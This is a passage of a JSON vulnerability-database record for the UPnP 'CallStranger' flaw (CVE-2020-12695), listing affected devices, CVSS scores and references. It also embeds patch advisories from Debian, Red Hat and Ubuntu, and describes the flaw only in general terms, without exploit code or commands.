"vendor": "ubiquiti",
"version": null
},
{
"_id": null,
"model": "hostapd",
"scope": null,
"trust": 0.8,
"vendor": "w1 fi",
"version": null
},
{
"_id": null,
"model": "selphy cp1200",
"scope": null,
"trust": 0.8,
"vendor": "canon",
"version": null
},
{
"_id": null,
"model": "wap131",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "wap150",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "wap351",
"scope": null,
"trust": 0.8,
"vendor": "cisco",
"version": null
},
{
"_id": null,
"model": "b1165nfw",
"scope": null,
"trust": 0.8,
"vendor": "dell",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"configurations": {
"_id": null,
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:asus:rt-n11",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:broadcom:adsl",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:d-link:dvg-n5412sp",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:ubiquiti_networks:unifi_controller",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:w1.fi:hostapd",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:canon:selphy_cp1200",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:wap131",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:wap150",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:cisco:wap351",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/h:dell:b1165nfw",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
}
]
},
"credits": {
"_id": null,
"data": "This vulnerability was reported by Yunus \u00c7adirci from EY Turkey. This document was written by Vijay Sarvepalli. ",
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
}
],
"trust": 0.8
},
"cve": "CVE-2020-12695",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2020-12695",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 1.1,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.8,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-165399",
"impactScore": 7.8,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.2,
"id": "CVE-2020-12695",
"impactScore": 4.7,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "High",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "JVNDB-2020-006708",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2020-12695",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-006708",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-165399",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"description": {
"_id": null,
"data": "The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration. In general, making UPnP available over the the Internet can pose further security vulnerabilities than the one described in this vulnerability note. Open Connectivity Foundation UPnP There is a vulnerability in the specification regarding improper default permissions.Information is obtained and service operation is interrupted (DoS) It may be put into a state. A security vulnerability exists in UPnP versions prior to 2020-04-17. \n\nCVE-2020-12695\n\n It was discovered that hostapd does not properly handle UPnP\n subscribe messages under certain conditions, allowing an attacker to\n cause a denial of service. \n\nCVE-2021-0326\n\n It was discovered that wpa_supplicant does not properly process P2P\n (Wi-Fi Direct) group information from active group owners. An\n attacker within radio range of the device running P2P could take\n advantage of this flaw to cause a denial of service or potentially\n execute arbitrary code. \n\nCVE-2021-27803\n\n It was discovered that wpa_supplicant does not properly process\n P2P (Wi-Fi Direct) provision discovery requests. An attacker\n within radio range of the device running P2P could take advantage\n of this flaw to cause a denial of service or potentially execute\n arbitrary code. \n\nFor the stable distribution (buster), these problems have been fixed in\nversion 2:2.7+git20190128+0c1e29f-6+deb10u3. \n\nWe recommend that you upgrade your wpa packages. \n\nFor the detailed security status of wpa please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/wpa\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU\nIa860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b\nq7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB\n9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529\n5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS\nBaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB\nwOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN\n7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a\naP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV\nBNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi\ne5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0=\n=CU/j\n-----END PGP SIGNATURE-----\n. In addition minidlna was susceptible to the\n\"CallStranger\" UPnP vulnerability. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: gssdp and gupnp security update\nAdvisory ID: RHSA-2021:1789-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1789\nIssue date: 2021-05-18\nCVE Names: CVE-2020-12695\n====================================================================\n1. Summary:\n\nAn update for gssdp and gupnp is now available for Red Hat Enterprise Linux\n8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64\n\n3. Description:\n\nGUPnP is an object-oriented open source framework for creating UPnP devices\nand control points, written in C using GObject and libsoup. The GUPnP API\nis intended to be easy to use, efficient and flexible. \n\nGSSDP implements resource discovery and announcement over SSDP and is part\nof gUPnP. \n\nThe following packages have been upgraded to a later upstream version:\ngssdp (1.0.5), gupnp (1.0.6). (BZ#1846589, BZ#1861928)\n\nSecurity Fix(es):\n\n* hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.4 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP\n\n6. Package List:\n\nRed Hat Enterprise Linux AppStream (v. 8):\n\nSource:\ngssdp-1.0.5-1.el8.src.rpm\ngupnp-1.0.6-1.el8.src.rpm\n\naarch64:\ngssdp-1.0.5-1.el8.aarch64.rpm\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-1.0.6-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\n\nppc64le:\ngssdp-1.0.5-1.el8.ppc64le.rpm\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-1.0.6-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-1.0.5-1.el8.s390x.rpm\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-1.0.6-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-1.0.5-1.el8.i686.rpm\ngssdp-1.0.5-1.el8.x86_64.rpm\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-1.0.6-1.el8.i686.rpm\ngupnp-1.0.6-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\n\nRed Hat CodeReady Linux Builder (v. 8):\n\naarch64:\ngssdp-debuginfo-1.0.5-1.el8.aarch64.rpm\ngssdp-debugsource-1.0.5-1.el8.aarch64.rpm\ngssdp-devel-1.0.5-1.el8.aarch64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm\ngupnp-debuginfo-1.0.6-1.el8.aarch64.rpm\ngupnp-debugsource-1.0.6-1.el8.aarch64.rpm\ngupnp-devel-1.0.6-1.el8.aarch64.rpm\n\nnoarch:\ngssdp-docs-1.0.5-1.el8.noarch.rpm\n\nppc64le:\ngssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngssdp-debugsource-1.0.5-1.el8.ppc64le.rpm\ngssdp-devel-1.0.5-1.el8.ppc64le.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm\ngupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm\ngupnp-debugsource-1.0.6-1.el8.ppc64le.rpm\ngupnp-devel-1.0.6-1.el8.ppc64le.rpm\n\ns390x:\ngssdp-debuginfo-1.0.5-1.el8.s390x.rpm\ngssdp-debugsource-1.0.5-1.el8.s390x.rpm\ngssdp-devel-1.0.5-1.el8.s390x.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm\ngupnp-debuginfo-1.0.6-1.el8.s390x.rpm\ngupnp-debugsource-1.0.6-1.el8.s390x.rpm\ngupnp-devel-1.0.6-1.el8.s390x.rpm\n\nx86_64:\ngssdp-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-debuginfo-1.0.5-1.el8.x86_64.rpm\ngssdp-debugsource-1.0.5-1.el8.i686.rpm\ngssdp-debugsource-1.0.5-1.el8.x86_64.rpm\ngssdp-devel-1.0.5-1.el8.i686.rpm\ngssdp-devel-1.0.5-1.el8.x86_64.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm\ngssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm\ngupnp-debuginfo-1.0.6-1.el8.i686.rpm\ngupnp-debuginfo-1.0.6-1.el8.x86_64.rpm\ngupnp-debugsource-1.0.6-1.el8.i686.rpm\ngupnp-debugsource-1.0.6-1.el8.x86_64.rpm\ngupnp-devel-1.0.6-1.el8.i686.rpm\ngupnp-devel-1.0.6-1.el8.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2020-12695\nhttps://access.redhat.com/security/updates/classification/#moderate\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2021 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6\nuJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl\nLw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P\n++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7\nizSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k\nMK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH\nfYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh\nYtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu\nm+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN\nHJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET\nV/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a\n7bb2GlcOcWo=2GSN\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. =========================================================================\nUbuntu Security Notice USN-4722-1\nFebruary 04, 2021\n\nminidlna vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 20.10\n- Ubuntu 20.04 LTS\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nReadyMedia (MiniDLNA) could be made to crash if it received specially crafted\ninput. (CVE-2020-12695)\n\nIt was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. \nA remote attacker could send a malicious UPnP HTTP request to the service\nusing HTTP chunked encoding and cause a denial of service. \n(CVE-2020-28926)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 20.10:\n minidlna 1.2.1+dfsg-2ubuntu0.1\n\nUbuntu 20.04 LTS:\n minidlna 1.2.1+dfsg-1ubuntu0.20.04.1\n\nUbuntu 18.04 LTS:\n minidlna 1.2.1+dfsg-1ubuntu0.18.04.1\n\nUbuntu 16.04 LTS:\n minidlna 1.1.5+dfsg-2ubuntu0.1\n\nIn general, a standard system update will make all the necessary changes",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-12695"
},
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161397"
}
],
"trust": 3.06
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-12695",
"trust": 4.0
},
{
"db": "CERT/CC",
"id": "VU#339275",
"trust": 3.3
},
{
"db": "PACKETSTORM",
"id": "158051",
"trust": 1.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2020/06/08/2",
"trust": 1.7
},
{
"db": "PACKETSTORM",
"id": "161288",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "162672",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159172",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597",
"trust": 0.7
},
{
"db": "CS-HELP",
"id": "SB2021122905",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2021052202",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1382",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0575",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.1728",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2021.0417",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4372",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2705",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4315.2",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2733",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3160",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "161397",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "161444",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2020-37941",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-165399",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-12695",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "169049",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168951",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#339275"
},
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "PACKETSTORM",
"id": "169049"
},
{
"db": "PACKETSTORM",
"id": "168951"
},
{
"db": "PACKETSTORM",
"id": "162672"
},
{
"db": "PACKETSTORM",
"id": "159172"
},
{
"db": "PACKETSTORM",
"id": "161288"
},
{
"db": "PACKETSTORM",
"id": "161397"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-597"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"id": "VAR-202006-0391",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
}
],
"trust": 0.6724206283333333
},
"last_update_date": "2026-04-10T22:22:02.011000Z",
"patch": {
"_id": null,
"data": [
{
"title": "RT-N11",
"trust": 0.8,
"url": "https://www.asus.com/us/Networking/RTN11/"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.broadcom.com/"
},
{
"title": "Canon SELPHY CP1200",
"trust": 0.8,
"url": "https://en.canon-me.com/support/consumer_products/products/printers/compact_photo/cd__cp_series/selphy_cp1200.html?type=drivers\u0026language=\u0026os=windows%208.1%20(64-bit)"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.cisco.com/c/en/us/index.html"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://us.dlink.com/en/consumer"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.dell.com/en-us"
},
{
"title": "Top Page",
"trust": 0.8,
"url": "https://community.ui.com/"
},
{
"title": "hostapd",
"trust": 0.8,
"url": "https://jvndb.jvn.jp/ja/contents/2019/JVNDB-2019-013311.html"
},
{
"title": "Debian CVElist Bug Report Logs: wpa: CVE-2020-12695",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=cdef40da4b3b6b2f4fcf08e447d20494"
},
{
"title": "Debian Security Advisories: DSA-4806-1 minidlna -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=5e0b1e00748aee507290bde9650370c7"
},
{
"title": "Arch Linux Advisories: [ASA-202012-16] hostapd: proxy injection",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories\u0026qid=ASA-202012-16"
},
{
"title": "Debian Security Advisories: DSA-4898-1 wpa -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2832d7aeef980951ddf42089219be7b3"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2020-12695 log"
},
{
"title": "awesome-from-stars",
"trust": 0.1,
"url": "https://github.com/krzemienski/awesome-from-stars "
},
{
"title": "callstranger-detector",
"trust": 0.1,
"url": "https://github.com/corelight/callstranger-detector "
},
{
"title": "CallStranger",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/CallStranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/Xcod3bughunt3r/CallStranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/yunuscadirci/DIALStranger "
},
{
"title": "",
"trust": 0.1,
"url": "https://github.com/aoeII/asuswrt-for-Tenda-AC9-Router "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-12695"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-276",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-165399"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006708"
},
{
"db": "NVD",
"id": "CVE-2020-12695"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 3.1,
"url": "https://www.kb.cert.org/vuls/id/339275"
},
{
"trust": 2.5,
"url": "https://github.com/yunuscadirci/callstranger"
},
{
"trust": 2.5,
"url": "https://www.tenable.com/blog/cve-2020-12695-callstranger-vulnerability-in-universal-plug-and-play-upnp-puts-billions-of"
},
{
"trust": 2.3,
"url": "http://packetstormsecurity.com/files/158051/callstranger-upnp-vulnerability-checker.html"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2020/dsa-4806"
},
{
"trust": 1.7,
"url": "https://www.debian.org/security/2021/dsa-4898"
},
{
"trust": 1.7,
"url": "https://corelight.blog/2020/06/10/detecting-the-new-callstranger-upnp-vulnerability-with-zeek/"
},
{
"trust": 1.7,
"url": "https://github.com/corelight/callstranger-detector"
},
{
"trust": 1.7,
"url": "https://www.callstranger.com"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00011.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00013.html"
},
{
"trust": 1.7,
"url": "https://lists.debian.org/debian-lts-announce/2020/12/msg00017.html"
},
{
"trust": 1.7,
"url": "http://www.openwall.com/lists/oss-security/2020/06/08/2"
},
{
"trust": 1.7,
"url": "https://usn.ubuntu.com/4494-1/"
},
{
"trust": 1.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12695"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 1.0,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 0.8,
"url": "https://callstranger.com"
},
{
"trust": 0.8,
"url": "https://openconnectivity.org/developer/specifications/upnp-resources/upnp/"
},
{
"trust": 0.8,
"url": "https://kb.cert.org/vuls/search/?q=upnp"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12695"
},
{
"trust": 0.8,
"url": "https://jvn.jp/ta/jvnta95827565/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/rqeyvy4d7lash6ai4wk3ik2qbfhhf3q2/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/mzdwhkgn3lmgsueoaavamod3iuipjvoj/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/l3shl4lofghj3dixsuiqelgvbdj7v7lb/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2021052202"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.4372/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2021.1728"
},
{
"trust": 0.6,
